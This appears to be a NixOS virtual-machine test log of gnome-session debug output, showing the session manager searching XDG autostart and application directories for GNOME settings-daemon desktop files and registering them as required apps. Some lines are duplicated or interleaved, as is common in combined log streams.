machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App11 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.ScreensaverProxy.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Sharing.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App12 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Sharing.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Smartcard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App12 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Sharing.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App13 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Smartcard.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Sound.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Smartcard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
